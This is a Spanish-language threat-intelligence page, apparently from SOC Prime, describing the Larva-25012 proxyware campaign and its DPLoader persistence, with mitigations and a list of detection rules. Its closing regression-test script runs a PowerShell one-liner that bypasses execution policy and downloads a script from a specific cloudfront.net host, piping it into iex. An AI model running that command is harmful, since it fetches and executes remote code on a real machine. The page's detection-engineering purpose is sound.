SOC Prime Bias: Medium

23 Sep 2026 08:04 UTC

Larva-25012: Una campaña de distribución de Proxyware de 2026

Author Photo
SOC Prime Team linkedin icon Seguir
Larva-25012: Una campaña de distribución de Proxyware de 2026
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

El actor de amenaza Larva-25012 está distribuyendo activamente Proxyware para monetizar sistemas comprometidos secuestrando el ancho de banda de internet de los usuarios. La campaña se basa en infecciones existentes de DPLoader y depende de múltiples canales de distribución, incluidos sitios de descarga de YouTube y GitHub. El malware despliega varias familias de Proxyware, incluidas DigitalPulse, SOAX, Appsalt e IPRoyal.

Investigación

El Centro de Inteligencia de Seguridad de AhnLab (ASEC) rastreó la actividad de proxyjacking en curso e identificó operaciones renovadas de Larva-25012 durante la segunda mitad de 2026. La investigación encontró que los atacantes utilizan variantes de JavaScript y Python de DPLoader para mantener la persistencia y ejecutar comandos de PowerShell. También se crean tareas programadas para asegurarse de que los scripts maliciosos continúen ejecutándose en sistemas comprometidos.

Mitigación

Los usuarios deben evitar descargar archivos ejecutables de sitios web sospechosos, anuncios emergentes o plataformas de intercambio de archivos no oficiales. El software debe obtenerse solo de fuentes confiables y legítimas, mientras que se deben evitar las aplicaciones crackeadas y los sitios de descarga ilegales. Las organizaciones también deben mantener las soluciones de protección de endpoints, incluido V3, completamente actualizadas.

Respuesta

Cuando se detecta actividad sospechosa, los administradores deben identificar y terminar los procesos de PowerShell maliciosos y las tareas programadas asociadas con las familias de Proxyware afectadas. También se deben verificar los sistemas para detectar DPLoader, que sirve como un componente clave de infección y persistencia. Revisar el tráfico de red saliente en busca de conexiones no autorizadas a infraestructura C2 conocida o sospechosa.

Flujo de Ataque

Todavía estamos actualizando esta parte.

Detecciones

Descarga o Carga a través de Powershell (a través de cmdline)

Equipo de SOC Prime
22 Sep 2026

Procesos Child de NodeJS Sospechosos [Windows] (a través de cmdline)

Equipo de SOC Prime
22 Sep 2026

Deshabilitar la Monitorización en Tiempo Real de Windows Defender y Otros Cambios de Preferencias (a través de cmdline)

Equipo de SOC Prime
22 Sep 2026

Llamar Métodos .NET Sospechosos desde Powershell (a través de powershell)

Equipo de SOC Prime
22 Sep 2026

Posible Abuso de Dominio de Desarrollo de Cloudflare (a través de dns)

Equipo de SOC Prime
22 Sep 2026

IOCs (HashMd5) para detectar: Larva-25012: Una Campaña de Distribución de Proxyware 2026

Reglas AI de SOC Prime
22 Sep 2026

Detección de Scripts de Instalación de PowerShell Proxyware [Windows Powershell]

Reglas AI de SOC Prime
22 Sep 2026

Script de Prueba de Regresión:

  • Narrativa & Comandos del Ataque: Un adversario, que intenta instalar proxyware para el uso no autorizado de ancho de banda (Larva-25012), ejecuta una sola línea de PowerShell. El objetivo es evadir el escaneo de archivos locales descargando la carga útil directamente en la memoria. Ellos utilizan el -ExecutionPolicy Bypass para garantizar que el script se ejecute y iwr para obtener el archivo de una distribución de Cloudfront, canalizándolo a iex para ejecución inmediata. Esta línea de comandos específica es una de las firmas objetivo en la regla de detección.

  • Script de Prueba de Regresión:

    # Simulación de Instalación de Proxyware Larva-25012
    # Este comando está diseñado específicamente para coincidir con la selección2 en la regla de detección.
    
    $cmd = 'PowerShell.Exe -ExecutionPolicy Bypass -Command "iwr -UseBasicParsing -Uri http://dhrciu5akloar.cloudfront.net/63563545600333.ps1 | iex"'
    
    # Usamos Start-Process para asegurar que la línea de comandos se capture como un nuevo evento de proceso
    Start-Process "powershell.exe" -ArgumentList "-ExecutionPolicy Bypass -Command `"iwr -UseBasicParsing -Uri http://dhrciu5akloar.cloudfront.net/63563545600333.ps1 | iex`""
  • Comandos de Limpieza:

    # No se descargan archivos debido a la naturaleza de la tubería 'iex' en la simulación, 
    # pero si se crearon artefactos, se eliminarían aquí.
    Write-Host "Limpieza de simulación completa. No se crearon artefactos persistentes."